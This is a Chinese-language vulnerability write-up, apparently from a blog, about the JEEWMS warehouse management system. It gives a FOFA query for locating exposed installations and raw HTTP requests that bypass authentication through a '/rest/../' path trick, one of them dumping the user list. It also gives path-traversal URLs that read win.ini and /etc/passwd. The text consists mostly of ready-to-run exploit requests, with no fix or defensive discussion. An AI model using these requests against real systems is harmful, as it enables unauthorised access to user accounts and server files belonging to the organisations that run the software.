# JEEWMS倉庫管理系統 權限繞過&未授權任意文件讀取漏洞
==影響版本==
JEEWMS全版本
==FOFA==
body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" && body="仓"
==權限繞過==
POST /wmstest/rest/../BiController.do?dayCount&reportType=line HTTP/1.1 Host: www.jeewms.cn Content-Length: 0 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Edg/85.0.564.63 X-Requested-With: XMLHttpRequest Origin: http://www.jeewms.cn Referer: http://www.jeewms.cn/wmstest/BiController.do?homebi Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5 Connection: close
POST /wmstest/rest/../userController.do?datagrid&field=id,userName,realName,userOrgList.tsDepart.departname,userKey,createBy,createDate,updateBy,updateDate,status, HTTP/1.1 Host: www.jeewms.cn Content-Length: 58 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Edg/85.0.564.63 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://www.jeewms.cn Referer: http://www.jeewms.cn/wmstest/userController.do?user&clickFunctionId=8a8ab0b246dc81120146dc8180df001f Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5 Connection: close page=1&rows=10&sort=createDate%2CuserName&order=asc%2Cdesc
==未授權任意文件讀取==
http://x.x.x.x:8088/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
http://x.x.x.x:8020/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容